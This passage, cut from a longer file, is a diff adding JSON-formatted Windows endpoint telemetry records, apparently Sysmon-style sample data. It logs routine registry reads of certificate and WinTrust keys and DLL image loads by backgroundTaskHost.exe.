"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cdp.dll", + "image_path": "C:\\Windows\\System32\\cdp.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", + "registry_value": "ContentDeliveryManager.Background.WatchdogTask", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wincorlib.dll", + "image_path": "C:\\Windows\\System32\\wincorlib.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sppc.dll", + "image_path": "C:\\Windows\\System32\\sppc.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": 